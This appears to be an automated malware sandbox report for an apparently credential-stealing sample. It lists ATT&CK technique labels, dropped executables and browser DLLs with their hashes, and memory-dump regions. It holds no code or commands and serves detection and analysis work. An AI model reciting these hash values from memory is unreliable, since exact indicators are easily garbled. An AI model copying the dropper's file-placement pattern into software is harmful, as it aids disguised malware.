T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Runtimebroker.exe
MD5
21b0c600acd7a7f957e3387f9a5c5aad

SHA1
297472985636d9bb5154992f4ad1e83bbdc821fe

SHA256
bd098349f7261ffae0cb0de33590d68730c7fd05eeb046ec7f3b4484a2b1cecb

SHA512
3d26fcb6a9aa64ae12ee8fbbe05a16fd5199c4b626e6fce321726aa03a249315f05500378487e847ca28d670326b17f915a8e8fb7f5ed7ed9cb67ce6120f815e

Download Submit
C:\ProgramData\Runtimebroker.exe
MD5
21b0c600acd7a7f957e3387f9a5c5aad

SHA1
297472985636d9bb5154992f4ad1e83bbdc821fe

SHA256
bd098349f7261ffae0cb0de33590d68730c7fd05eeb046ec7f3b4484a2b1cecb

SHA512
3d26fcb6a9aa64ae12ee8fbbe05a16fd5199c4b626e6fce321726aa03a249315f05500378487e847ca28d670326b17f915a8e8fb7f5ed7ed9cb67ce6120f815e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
6bf0e5945fb9da68e1b03bdaed5f6f8d

SHA1
eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

SHA256
dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

SHA512
977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9c124072f58bbb02dec8580b37ec090c

SHA1
96328890ba89b73a6ff28e3a2b0cc75e8e67d868

SHA256
5b6cff6a25e4e4e8939c8026a0e76f7cd1987c873fc403d5be1c9a2f9252938f

SHA512
9849b70462f454a7ae6a03866fcf73ccb7d325e05ef662d55ee50a7f9d3e976bb46b01cfd1ed33bcb5d0c9f02cf25f31f48481f583a516d2f42c3c474a22f7ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
11d838827e27b5fe60dce1495951e403

SHA1
d83c25fa6f022888824d457d74a64044bc025902

SHA256
6dc4307022af546971d7216f389772c8986f39995265191b5995561099d59052

SHA512
5ed0c13b1ffd531d2669bf451d3eccf893345bba0af7d989f692261eb4bd7e02b6fc6a4462909a912eb32dd852e49df42154877390182f427fd5a78411eba659

Download Submit
C:\Users\Admin\AppData\Local\Temp\4J0sUZK11d.exe
MD5
1770a0e98a4d78983f336eba64e859df

SHA1
54ffcd3aff807860d765f41933a9e92f0bd359ae

SHA256
1b2a01df5ea1d61efe89352a307c4c9c27b9dce72d8a907cdd314c56cd064161

SHA512
b9cefa3c9b0af64e730454bdcc40dc07e0c579e4dae038ba175e3ef0215ccd8f436c07ce6439bc4a091765fd4c2870746137c9bbef938c4bc00ff3264d8e3997

Download Submit
C:\Users\Admin\AppData\Local\Temp\4J0sUZK11d.exe
MD5
1770a0e98a4d78983f336eba64e859df

SHA1
54ffcd3aff807860d765f41933a9e92f0bd359ae

SHA256
1b2a01df5ea1d61efe89352a307c4c9c27b9dce72d8a907cdd314c56cd064161

SHA512
b9cefa3c9b0af64e730454bdcc40dc07e0c579e4dae038ba175e3ef0215ccd8f436c07ce6439bc4a091765fd4c2870746137c9bbef938c4bc00ff3264d8e3997

Download Submit
C:\Users\Admin\AppData\Local\Temp\693A.exe
MD5
21b0c600acd7a7f957e3387f9a5c5aad

SHA1
297472985636d9bb5154992f4ad1e83bbdc821fe

SHA256
bd098349f7261ffae0cb0de33590d68730c7fd05eeb046ec7f3b4484a2b1cecb

SHA512
3d26fcb6a9aa64ae12ee8fbbe05a16fd5199c4b626e6fce321726aa03a249315f05500378487e847ca28d670326b17f915a8e8fb7f5ed7ed9cb67ce6120f815e

Download Submit
C:\Users\Admin\AppData\Local\Temp\693A.exe
MD5
21b0c600acd7a7f957e3387f9a5c5aad

SHA1
297472985636d9bb5154992f4ad1e83bbdc821fe

SHA256
bd098349f7261ffae0cb0de33590d68730c7fd05eeb046ec7f3b4484a2b1cecb

SHA512
3d26fcb6a9aa64ae12ee8fbbe05a16fd5199c4b626e6fce321726aa03a249315f05500378487e847ca28d670326b17f915a8e8fb7f5ed7ed9cb67ce6120f815e

Download Submit
C:\Users\Admin\AppData\Local\Temp\6EF8.exe
MD5
fae8647fd16b99bfd4eaefeca4fe894b

SHA1
949ad3aedafa32a6bc5eebfd478282a807a58b5b

SHA256
423c39c05e6542b80b279484a4eb22123aeaa2cbfa24c4c812df9c066c2d0e24

SHA512
eb2a7bfcbcbc6bfb70ba4040362504271236cd76fd2737723c65665a6fdd140385fb730b01619b1349f424d991ddb86dbada96b952454d86fd53167b7de07684

Download Submit
C:\Users\Admin\AppData\Local\Temp\6EF8.exe
MD5
fae8647fd16b99bfd4eaefeca4fe894b

SHA1
949ad3aedafa32a6bc5eebfd478282a807a58b5b

SHA256
423c39c05e6542b80b279484a4eb22123aeaa2cbfa24c4c812df9c066c2d0e24

SHA512
eb2a7bfcbcbc6bfb70ba4040362504271236cd76fd2737723c65665a6fdd140385fb730b01619b1349f424d991ddb86dbada96b952454d86fd53167b7de07684

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
MD5
1770a0e98a4d78983f336eba64e859df

SHA1
54ffcd3aff807860d765f41933a9e92f0bd359ae

SHA256
1b2a01df5ea1d61efe89352a307c4c9c27b9dce72d8a907cdd314c56cd064161

SHA512
b9cefa3c9b0af64e730454bdcc40dc07e0c579e4dae038ba175e3ef0215ccd8f436c07ce6439bc4a091765fd4c2870746137c9bbef938c4bc00ff3264d8e3997

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
MD5
1770a0e98a4d78983f336eba64e859df

SHA1
54ffcd3aff807860d765f41933a9e92f0bd359ae

SHA256
1b2a01df5ea1d61efe89352a307c4c9c27b9dce72d8a907cdd314c56cd064161

SHA512
b9cefa3c9b0af64e730454bdcc40dc07e0c579e4dae038ba175e3ef0215ccd8f436c07ce6439bc4a091765fd4c2870746137c9bbef938c4bc00ff3264d8e3997

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce

SHA1
b423959793f14b1416bc3b7051bed58a1034025f

SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

Download Submit
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
MD5
60acd24430204ad2dc7f148b8cfe9bdc

SHA1
989f377b9117d7cb21cbe92a4117f88f9c7693d9

SHA256
9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

SHA512
626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

Download Submit
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
MD5
eae9273f8cdcf9321c6c37c244773139

SHA1
8378e2a2f3635574c106eea8419b5eb00b8489b0

SHA256
a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

SHA512
06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

Download Submit
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
MD5
02cc7b8ee30056d5912de54f1bdfc219

SHA1
a6923da95705fb81e368ae48f93d28522ef552fb

SHA256
1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

SHA512
0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

Download Submit
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
MD5
4e8df049f3459fa94ab6ad387f3561ac

SHA1
06ed392bc29ad9d5fc05ee254c2625fd65925114

SHA256
25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

SHA512
3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

Download Submit
memory/492-122-0x0000000000000000-mapping.dmp

Download
memory/492-128-0x00000000048E0000-0x0000000004973000-memory.dmp

Filesize
588KB

Download
memory/492-129-0x0000000000400000-0x0000000002CB4000-memory.dmp

Filesize
40.7MB

Download
memory/580-445-0x0000000000000000-mapping.dmp

Download
memory/996-114-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/996-169-0x0000000008200000-0x0000000008201000-memory.dmp

Filesize
4KB

Download
memory/996-184-0x0000000001283000-0x0000000001284000-memory.dmp

Filesize
4KB

Download
memory/996-166-0x00000000078C0000-0x00000000078C1000-memory.dmp

Filesize
4KB

Download
memory/996-115-0x0000000000400000-0x0000000000902000-memory.dmp

Filesize
5.0MB

Download
memory/996-156-0x0000000000000000-mapping.dmp

Download
memory/996-185-0x0000000009360000-0x00000000094BB000-memory.dmp

Filesize
1.4MB

Download
memory/996-178-0x00000000098D0000-0x00000000098D1000-memory.dmp

Filesize
4KB

Download
memory/996-173-0x0000000001282000-0x0000000001283000-memory.dmp

Filesize
4KB

Download
memory/996-172-0x0000000001280000-0x0000000001281000-memory.dmp

Filesize
4KB

Download
memory/1332-120-0x0000000004780000-0x00000000047B9000-memory.dmp

Filesize
228KB

Download
memory/1332-121-0x0000000000400000-0x0000000002C86000-memory.dmp

Filesize
40.5MB

Download
memory/1332-117-0x0000000000000000-mapping.dmp

Download
memory/1548-130-0x0000000000400000-0x0000000002C86000-memory.dmp

Filesize
40.5MB

Download
memory/1548-125-0x0000000000000000-mapping.dmp

Download
memory/2020-215-0x00000000097B0000-0x00000000097B1000-memory.dmp

Filesize
4KB

Download
memory/2020-186-0x0000000000000000-mapping.dmp

Download
memory/2020-421-0x0000000009CA0000-0x0000000009CA1000-memory.dmp

Filesize
4KB

Download
memory/2020-415-0x0000000009CB0000-0x0000000009CB1000-memory.dmp

Filesize
4KB

Download
memory/2020-245-0x0000000004F53000-0x0000000004F54000-memory.dmp

Filesize
4KB

Download
memory/2020-220-0x0000000009A40000-0x0000000009A41000-memory.dmp

Filesize
4KB

Download
memory/2020-213-0x000000007EEA0000-0x000000007EEA1000-memory.dmp

Filesize
4KB

Download
memory/2020-207-0x00000000097D0000-0x0000000009803000-memory.dmp

Filesize
204KB

Download
memory/2020-192-0x0000000004F52000-0x0000000004F53000-memory.dmp

Filesize
4KB

Download
memory/2020-191-0x0000000004F50000-0x0000000004F51000-memory.dmp

Filesize
4KB

Download
memory/2180-116-0x0000000001130000-0x0000000001146000-memory.dmp

Filesize
88KB

Download
memory/2216-446-0x0000000000000000-mapping.dmp

Download
memory/2304-442-0x0000000000000000-mapping.dmp

Download
memory/2436-454-0x0000000000000000-mapping.dmp

Download
memory/2644-447-0x0000000002C70000-0x0000000002DBA000-memory.dmp

Filesize
1.3MB

Download
memory/2644-448-0x0000000000400000-0x0000000002C6A000-memory.dmp

Filesize
40.4MB

Download
memory/2644-441-0x0000000000000000-mapping.dmp

Download
memory/2648-440-0x0000000000000000-mapping.dmp

Download
memory/3276-144-0x0000000008A30000-0x0000000008A31000-memory.dmp

Filesize
4KB

Download
memory/3276-135-0x0000000007A70000-0x0000000007A71000-memory.dmp

Filesize
4KB

Download
memory/3276-150-0x00000000096F0000-0x00000000096F1000-memory.dmp

Filesize
4KB

Download
memory/3276-151-0x0000000009770000-0x0000000009771000-memory.dmp

Filesize
4KB

Download
memory/3276-139-0x0000000008210000-0x0000000008211000-memory.dmp

Filesize
4KB

Download
memory/3276-138-0x0000000007860000-0x0000000007861000-memory.dmp

Filesize
4KB

Download
memory/3276-137-0x0000000004F72000-0x0000000004F73000-memory.dmp

Filesize
4KB

Download
memory/3276-136-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/3276-143-0x0000000008B00000-0x0000000008B01000-memory.dmp

Filesize
4KB

Download
memory/3276-149-0x0000000009A40000-0x0000000009A41000-memory.dmp

Filesize
4KB

Download
memory/3276-152-0x0000000009FE0000-0x0000000009FE1000-memory.dmp

Filesize
4KB

Download
memory/3276-142-0x00000000085F0000-0x00000000085F1000-memory.dmp

Filesize
4KB

Download
memory/3276-141-0x0000000008280000-0x0000000008281000-memory.dmp

Filesize
4KB

Download
memory/3276-134-0x0000000004F20000-0x0000000004F21000-memory.dmp

Filesize
4KB

Download
memory/3276-131-0x0000000000000000-mapping.dmp

Download
memory/3276-170-0x0000000004F73000-0x0000000004F74000-memory.dmp

Filesize
4KB

Download
memory/3276-140-0x0000000007A00000-0x0000000007A01000-memory.dmp

Filesize
4KB

Download
memory/3632-453-0x0000000002FA0000-0x0000000002FA4000-memory.dmp

Filesize
16KB

Download
memory/3632-455-0x0000000000400000-0x0000000002C6A000-memory.dmp

Filesize
40.4MB

Download